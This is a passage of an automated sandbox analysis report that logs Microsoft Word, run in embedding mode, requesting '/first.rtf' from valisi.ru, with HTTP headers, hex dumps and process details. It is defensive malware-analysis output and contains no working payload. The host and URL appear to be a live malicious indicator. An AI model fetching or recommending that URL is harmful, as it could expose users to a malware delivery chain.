        Apr 19, 2025 02:44:45.242647886 CEST1358INData Raw: 32 30 63 38 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 45 55 52
        Data Ascii: 20c8<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "EUR";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");}if (w
        Apr 19, 2025 02:44:45.242692947 CEST1358INData Raw: 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 36 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 22 3e d0 93 d0 bb d0 b0 d0 b2 d0
        Data Ascii: rrent_page_item menu-item-home menu-item-62"><a href="http://valisi.ru/"></a></li><li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="http://valisi.ru/about/">
        Apr 19, 2025 02:44:45.262331009 CEST1358INData Raw: 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 70 72 69 63 65 5f 68 79 64 72 6f 74 65 63 68 5f 32 30 31 35 2e 70 64 66 22 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 6c 69 6e 6b 22 3e d0 9f d1 80 d0 b0 d0 b9 d1 81 2d d0 bb d0
        Data Ascii: ontent/uploads/2016/05/price_hydrotech_2015.pdf" class="slide-link">-</a></div> ... /slider --><div class="content"><ul class="cat maincat"><li><a href="http://valisi.ru/obezzhelezivanie/" class="cat-img"><img src
        Apr 19, 2025 02:44:45.539453030 CEST1358INData Raw: 61 74 2d 74 69 74 6c 65 22 3e d0 9e d0 b1 d0 b5 d1 81 d1 81 d0 be d0 bb d0 b8 d0 b2 d0 b0 d0 bd d0 b8 d0 b5 3c 2f 61 3e 0a 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 63 61 74 2d 73 75 62 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 3c
        Data Ascii: at-title"></a><ul class="cat-submenu"></ul><li><a href="http://valisi.ru/reagenty/" class="cat-img"><img src="http://valisi.ru/wp-content/uploads/2016/05/reagenty-e14119751904911.png" alt="


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.44973491.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:45.547377110 CEST468OUTHEAD /first.rtf HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-IDCRL_ACCEPTED: t
        Host: valisi.ru
        Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d; wfvt_1026485859=6802f1fbe39a9; PHPSESSID=c23817273c64555c130cc0150a4922ad
        Apr 19, 2025 02:44:46.295002937 CEST476INHTTP/1.1 404 Not Found
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: wfvt_1026485859=6802f1fe1a5cc; expires=Sat, 19-Apr-2025 01:14:46 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        cache-control: no-cache, must-revalidate, max-age=0
        pragma: no-cache
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        date: Sat, 19 Apr 2025 00:44:46 GMT
        server: LiteSpeed


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.44973591.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:46.680639982 CEST258OUTGET /first.rtf HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: valisi.ru
        Connection: Keep-Alive
        Cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; wfvt_1026485859=6802f1fcf250d
        Apr 19, 2025 02:44:47.339966059 CEST1358INHTTP/1.1 404 Not Found
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: wfvt_1026485859=6802f1ff2de53; expires=Sat, 19-Apr-2025 01:14:47 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        cache-control: no-cache, must-revalidate, max-age=0
        pragma: no-cache
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        content-encoding: gzip
        vary: Accept-Encoding
        date: Sat, 19 Apr 2025 00:44:47 GMT
        server: LiteSpeed
        Data Raw: 63 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db ca f1 d9 fe 8a 15 0b 58 e4 09 c5 8b 44 59 8e 6c da 50 64 1b 0d 9a 34 41 ec 83 a2 b0 0d 61 4d ae a4 75 28 92 67 b9 b2 2c d8 02 8a 3e f4 3f fa 07 79 e8 01 da 87 fe 83 cf 1f 75 76 97 94 a8 8b 13 fb 24 28 60 53 e4 5e e6 3e b3 33 b3 07 95 e3 0f dd f3 bf 7e 3c 41 43 3e 8a 0e b7 0f c4 0f 8a 70 3c f0 35 36 d6 c4 00 c1 e1 e1 f6 d6 c1 88 70 8c 82 21 66 19 e1 be f6 f3 f9 69 6d 0f a6 f3 f1 18 8f 88 af dd 52 32 49 13 c6 35 14 24 31 27 31 ac 9b d0 90 0f 7d d7 75 9c d5 c5 78 cc 87 09 2b 2d ed 84 b7 38 0e 48 88 32 3e 0e 69 22 d7 73 ca 23 72 f8 f8 cf df fe fe db df 1e bf 3c fe f7 f1 df bf fd e3 f1 0b 82 97 5f c5 e3 cb e3 7f 1e ff f5 f8 ab 78 43 e8 01 a1 53 1a 8d 38 09 0e 6c b5 6f 7b 6b 89 bc b3 3f 01 9f bd f3 0f 1f de bd e9 7c 2a 21 5e 1a ef 7d ec 7c 3a 3b f9 d4 eb 7e 78 ff b1 73 fe f6 cd bb 13 0d d9 40 0a 10 53 a9 d5 50 90 65 a8 56 13 a4 45 34 fe 8c 18 89 7c 2d 03 3e 78 30 e6 88 02 db 1a 1a 32 d2 f7 b5 21 e7 69 db b6 6f 71 44 33 6a b1 b1 3d 49 6b b9 54 6c [TRUNCATED]
        Data Ascii: c15nXDYlPd4AaMu(g,>?yuv$(`S^>3~<AC>p<56p!fimR2I5$1'1}ux+-8H2>i"s#r<_xCS8lo{k?|*!^}|:;~xs@SPeVE4|->x02!ioqD3j=IkTl>$#}qF2njCr-AK0U&8}hfdFS2YsMo9N60L"T%O#U)q|1aS^'wFH`[II4J"W*B@M9X0Wf6$ 69m[Ax%M%Pe4fa=y^8+i`9RsjTHtkkB0XIJF=#`!k8#?HkK[Y+aKdv0riv~_.g>d50s:+Rxh7r}O"kDcdpU;uFknul/qA:1!l&/f~b'auaz
        Apr 19, 2025 02:44:47.339998007 CEST1358INData Raw: 50 3f 31 b9 b5 59 a6 66 62 0d 08 cf f7 65 6f a6 e7 78 f0 67 88 7c ba 26 82 a4 66 5c 38 57 16 4e 53 50 52 77 48 a3 50 e7 c6 ac 9f 30 9d f9 1d c6 f0 14 f0 d0 51 1a 11 90 58 3f c2 42 70 e3 18 3c 3e 24 7b f0 1a 52 69 04 7c aa 19 80 3d 1b a7 22 8e 66
        Data Ascii: P?1Yfbeoxg|&f\8WNSPRwHP0QX?Bp<>${Ri|="f=)\|$gf;"p?~X@`R.D.`C@cmW;S:kR3d^afAag,b0$LX|mqP8LP\+
        Apr 19, 2025 02:44:47.340028048 CEST935INData Raw: 52 f4 ca 18 10 14 5e e3 e5 c4 5a 30 1a 42 0b a2 60 b7 ae e8 53 5b d4 f6 b2 7b e7 12 84 4d 3c e1 50 a4 e6 d1 40 02 ab cb 49 57 2a c2 95 60 5c d2 2e c0 f7 20 27 c8 57 3f 0f 45 ee 79 25 c6 04 03 64 94 42 af 20 c7 aa 54 5e f2 c1 a5 88 b3 41 1b a5 f0
        Data Ascii: R^Z0B`S[{M<P@IW*`\. 'W?Ey%dB T^AxgVhV65xg]*:(v&GQyB,$A@#~O +cT?*B8^fQ},5[dL8LLY8#GcA7<sC=?2a0=_zK6qV
        Apr 19, 2025 02:44:47.369962931 CEST1358INData Raw: 37 34 31 0d 0a cd 5b 5b 4f 1b 47 14 7e 86 5f 31 75 1f 02 52 76 6d 73 09 d0 1a ab 6a 84 fa 98 96 28 4f 6d 85 c6 f6 1a 2f 71 bc 96 2f 38 a6 aa 14 a0 52 13 05 15 29 ad 54 a9 52 9a 56 7d ea 1b 29 21 a1 40 88 d4 5f b0 fb 8f fa 9d 33 b3 bb 93 35 2c 84
        Data Ascii: 741[[OG~_1uRvmsj(Om/q/8R)TRV})!@_35,nJ]9so.r1++b(ZYwq[pl||l3yG6#&GB"Q~)jfj"7hsST].G|9h<0F&]k6D)#%;Q
        Apr 19, 2025 02:44:47.370465040 CEST506INData Raw: 56 d7 ab ea 8c 3b dc 96 bd 1f 45 c6 75 44 05 1a 9b 13 f2 d1 9f eb 95 d4 9f 7b 83 d4 9f bd bb 0c b0 56 7b bd 70 77 66 ea 92 66 30 de 12 44 fb c6 38 a0 86 73 e4 97 68 e7 07 a7 c4 8b 12 af d2 c9 c8 18 e7 65 dd 56 31 9a b9 1e 3b 4e bd b5 2c a3 fc f4
        Data Ascii: V;EuD{V{pwff0D8sheV1;N,h_VgPItd2gUreX]qPFbP,"&oxk8Wpq<S5n)KvhnA3_l.X]aO)D9b$Q'h
        Apr 19, 2025 02:44:47.370488882 CEST5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        050100s020406080100

        Click to jump to process

        050100s0.0050100150MB

        Click to jump to process

        • File
        • Registry

        Click to dive into process behavior distribution

        Target ID:0
        Start time:20:44:31
        Start date:18/04/2025
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x7f0000
        File size:1'620'872 bytes
        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        No disassembly